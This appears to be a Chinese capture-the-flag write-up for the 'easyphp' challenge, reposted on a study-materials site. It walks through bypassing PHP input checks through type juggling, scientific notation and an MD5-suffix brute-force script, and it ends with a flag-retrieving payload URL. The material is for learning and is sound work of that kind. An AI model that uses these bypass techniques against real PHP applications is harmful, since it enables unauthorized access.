文章详情

短信预约-IT技能 免费直播动态提醒

请输入下面的图形验证码

提交验证

短信预约提醒成功

【攻防世界】easyphp

2023-08-31 07:12

关注

废话不多说,打开环境就是一大段的php代码,对于我一个小白来说,还是难阿!只能一点点琢磨构造payload的思路,当然也是在网上参考了别人的wp。记录下来也为了加深自己的印象,有事没事都能翻一翻,温故而知新嘛。

 6000000 && strlen($a) <= 3){    if(isset($b) && '8b184b' === substr(md5($b),-6,6)){        $key1 = 1;        }else{            die("Emmm...再想想");        }    }else{    die("Emmm...");}$c=(array)json_decode(@$_GET['c']);if(is_array($c) && !is_numeric(@$c["m"]) && $c["m"] > 2022){    if(is_array(@$c["n"]) && count($c["n"]) == 2 && is_array($c["n"][0])){        $d = array_search("DGGJ", $c["n"]);        $d === false?die("no..."):NULL;        foreach($c["n"] as $key=>$val){            $val==="DGGJ"?die("no......"):NULL;        }        $key2 = 1;    }else{        die("no hack");    }}else{    die("no");}if($key1 && $key2){    include "Hgfks.php";    echo "You're right"."\n";    echo $flag;}?> Emmm...

看最后一段,当key1和key2的值都为1时,才会返回flag的值。而key1和key2需要当a、b、c三个参数都满足条件时才会被赋值为1。

一段一段来分析,首先是a和b两个参数的要求。

if(isset($a) && intval($a) > 6000000 && strlen($a) <= 3){    if(isset($b) && '8b184b' === substr(md5($b),-6,6)){        $key1 = 1;        }else{            die("Emmm...再想想");        }    }else{    die("Emmm...");}

a的值需要大于6000000但是长度却不能大于3,很容易能想到用科学计数法来表示,比如1e8、1e9都可以。

b的md5值的最后6位需为“8b184b”,这个除了写脚本爆破好像也不知道还有什么更好的办法了。==>md5(53724)

import hashlibfor i in range(100000):    b=i.to_bytes(22, 'big')    m=hashlib.md5(str(i).encode()).hexdigest()    if(m[-6:]=="8b184b"):        print(i)        print(m)

接着看一下c

$c=(array)json_decode(@$_GET['c']);if(is_array($c) && !is_numeric(@$c["m"]) && $c["m"] > 2022){    if(is_array(@$c["n"]) && count($c["n"]) == 2 && is_array($c["n"][0])){        $d = array_search("DGGJ", $c["n"]);        $d === false?die("no..."):NULL;        foreach($c["n"] as $key=>$val){            $val==="DGGJ"?die("no......"):NULL;        }        $key2 = 1;    }else{        die("no hack");    }}else{    die("no");}

c是个json格式的参数,且m键对应的值不为数字的同时需要满足大于2022

is_numeric在php中判断参数是否是数值类型是否是数字或数字字符串。"2222a"会被判定为false。
如果“2222a”和2022比较,则可以看作2222与2022的比较;若为“a2222”,则会被认定为0。
因此这里m键对应的参数可以为“2333abc”,可以同时满足上述的条件。

n键对应的值为数组,个数为2,且数组里的第一个元素也为数组,即[[...],...]

再往下看,如果n键对应值里面没有DGGJ,则会被判定为false,直接die,但下面又说如果遍历到了DGGJ也会被直接die...

array_search() 函数与 in_array() 一样,在数组中查找一个键值。如果找到了该值,匹配元素的键名会被返回。如果没找到,则返回 false。其实相当于键值与“DGGJ”进行比较,而 php中当一个数字与一个字符串/字符进行大小比较时,首先系统尝试将此字符串/字符转换为整型/浮点型,然后进行比较。所以当n键对应的值为数字且包含数字0的话,DGGJ被视为0,即可在”其中找到DGGJ“,返回True。

所以可以构造出c为{"m":"2333abc","n":[[0,1],0]}

综上

构造payload:

http://ip/:port/?a=1e9&b=53724&c={"m":"2333abc","n":[[0,1],0]}

来源地址:https://blog.csdn.net/m0_51683653/article/details/128839648

阅读原文内容投诉

免责声明:

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

软考中级精品资料免费领

  • 历年真题答案解析
  • 备考技巧名师总结
  • 高频考点精准押题
  • 2024年上半年信息系统项目管理师第二批次真题及答案解析(完整版)

    难度     813人已做
    查看
  • 【考后总结】2024年5月26日信息系统项目管理师第2批次考情分析

    难度     354人已做
    查看
  • 【考后总结】2024年5月25日信息系统项目管理师第1批次考情分析

    难度     318人已做
    查看
  • 2024年上半年软考高项第一、二批次真题考点汇总(完整版)

    难度     435人已做
    查看
  • 2024年上半年系统架构设计师考试综合知识真题

    难度     224人已做
    查看

相关文章

发现更多好内容

猜你喜欢

AI推送时光机
位置:首页-资讯-后端开发
咦!没有更多了?去看看其它编程学习网 内容吧
首页课程
资料下载
问答资讯